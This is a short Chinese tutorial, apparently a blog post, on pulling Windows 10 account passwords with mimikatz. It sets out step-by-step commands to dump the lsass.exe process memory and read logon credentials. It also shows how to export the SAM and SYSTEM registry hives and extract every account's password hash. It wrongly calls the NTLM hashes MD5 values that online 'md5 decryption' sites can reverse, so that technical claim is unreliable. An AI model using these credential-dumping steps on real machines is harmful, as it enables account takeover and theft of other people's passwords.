windows10下破解开机密码

准备工具：

一台windows10测试机

mimikatz(猕猴桃破解工具) 

1.破解win10下当前账户的密码

原理是从内存中破解

打开任务管理器

详细信息->按ls找到名为lsass.exe的进程

右键

输入lsass搜索

把此文件复制到猕猴桃x64文件夹下

以管理员身份运行猕猴桃

输入以下三条命令：

privilege::debug  sekurlsa::logonPasswords full

sekurlsa::minidump lsass.dmp

sekurlsa::logonPasswords full

到此步

NTLM是加密过的账户密码

把加密的密码拿去md5解密网站解密就得到了windows密码

2.破解win10所有账户密码

此方法破解win10下所有账户的密码

原理是利用注册表文件

打开带管理员权限的cmd窗口

进入根目录

cd \

导出hash：

reg save hklm\sam sam.hive

reg save hklm\system system.hive

进入根

剪切刚刚导出的注册表文件到猕猴桃x64目录下

以管理员权限打开猕猴桃

此步破解将会获得所有账户的哈希密码

lsadump::sam /sam:sam.hive /system:system.hive

（测试机只有一个账户）

将得到的md5值拿到在线md5解密网站即可获得密码